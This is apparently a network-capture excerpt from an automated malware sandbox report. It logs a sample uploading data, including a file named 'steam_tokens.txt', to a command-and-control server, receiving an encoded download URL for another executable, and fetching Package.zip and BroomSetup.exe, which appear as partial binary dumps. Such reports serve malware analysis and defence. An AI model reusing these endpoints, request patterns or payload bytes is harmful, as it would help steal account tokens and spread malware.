Apr 27, 2024 02:20:42.784655094 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:43.090806007 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:43.096477032 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:43.403744936 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:43.411514044 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:43.707699060 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:43.714087963 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:44.416491985 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:44.421632051 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:44.728133917 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:44.734600067 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:45.036729097 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:45.042309999 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:45.343576908 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:45.349347115 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:45.658648968 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:45.663928032 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDHDAFIDGDBGCAAFIDH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:45.970798969 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:45.976511002 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:46.280307055 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:46.286247969 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKKJJJKJKFHJJJJECBF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:46.588146925 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:46.596127033 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:46.902663946 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:46.910013914 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJEC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:47.216236115 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:47.238358021 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:47.535085917 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:47.594398975 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHC Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 42 46 42 41 45 42 4b 4a 4b 45 42 47 43 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HCFBFBAEBKJKEBGCAEHCContent-Disposition: form-data; name="file"------HCFBFBAEBKJKEBGCAEHC--
Apr 27, 2024 02:20:47.897496939 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:48.043495893 CEST	203	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJK Host: 185.172.128.76 Content-Length: 84915 Connection: Keep-Alive Cache-Control: no-cache
Apr 27, 2024 02:20:48.640420914 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 27, 2024 02:20:50.783633947 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="message"her7h48r------JEGDGIIJJECFIDHJJKKF--
Apr 27, 2024 02:20:51.088959932 CEST	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Apr 2024 00:20:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 52 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38 Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	176.97.76.106	80	4312	C:\Users\user\Desktop\TNQTc6Qmkg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:19:02.811662912 CEST	185	OUT	GET /1/Package.zip HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 02:19:03.007100105 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 27 Apr 2024 00:03:42 GMT Content-Type: application/zip Content-Length: 3884863 Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT Connection: keep-alive ETag: "66289c8a-3b473f" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb [TRUNCATED] Data Ascii: PK?XIbunch.dat\]: "TN<wfX $;e)\|u]+UV~fRje@frVJ-#U=TE5Z&z'k%Je[5PB@.Gz[-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O:J%o`f+OW>SINCm6\|wQxkKoD:n4P>M_\|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF\|)@W6Z79d'`_6zr%a7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.\|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>Z5(]
Apr 27, 2024 02:19:03.007158041 CEST	1289	IN	Data Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
Apr 27, 2024 02:19:03.007222891 CEST	1289	IN	Data Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H\|Im8zn2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;,.\|j\[S
Apr 27, 2024 02:19:03.007268906 CEST	1289	IN	Data Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5 Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
Apr 27, 2024 02:19:03.007296085 CEST	1289	IN	Data Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a Data Ascii: ><:X4.`="+P!`p;KE.\|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_\|gYA#8
Apr 27, 2024 02:19:03.007349968 CEST	1289	IN	Data Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43 Data Ascii: 94SI6j<TNmokj>_P7!Wv}!K2@3Cs-<HIo5 Q0V?4v^i2D5v$ip^`RLK$.0 ^wS~W _h:JIEE;/?j8-
Apr 27, 2024 02:19:03.007368088 CEST	1289	IN	Data Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8 Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
Apr 27, 2024 02:19:03.007584095 CEST	1289	IN	Data Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
Apr 27, 2024 02:19:03.007668972 CEST	1289	IN	Data Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb Data Ascii: 2h\T^BTZP{@%{J.B\|n$=6icc6%Zxn1#]\|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
Apr 27, 2024 02:19:03.007703066 CEST	1289	IN	Data Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25 Data Ascii: p_%cBeg3-Ul #B\|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
Apr 27, 2024 02:19:03.204054117 CEST	1289	IN	Data Raw: fc b7 8a 91 81 fd bd 3e b8 27 f4 5e e3 be 4e b9 09 07 0b 83 76 51 ce 7b f3 45 d3 ea b5 e6 16 21 d2 a4 f9 f9 77 96 84 d3 f5 bb 5a b2 0f c6 ef bc 9e 3e 49 7d 9f ec 5f f4 28 7f 86 7b 4e 93 76 35 c1 86 30 75 66 d6 58 5c 92 6f af 89 ed 9e 29 3b 3b d4 Data Ascii: >'^NvQ{E!wZ>I}_({Nv50ufX\o);;Ed_* :-aG7Y:%5hf35lvN>>}oJw!/[Ax*u}B\|^t!Zj^FKG>vokAk/1IiuA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	185.172.128.228	80	4312	C:\Users\user\Desktop\TNQTc6Qmkg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 02:19:53.664659023 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 27, 2024 02:19:53.837498903 CEST	1289	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 00:19:53 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@ [TRUNCATED]
Apr 27, 2024 02:19:53.837605000 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
Apr 27, 2024 02:19:53.837742090 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 27, 2024 02:19:53.837848902 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 27, 2024 02:19:53.837953091 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 27, 2024 02:19:53.838057041 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 27, 2024 02:19:53.838143110 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
Apr 27, 2024 02:19:53.838201046 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
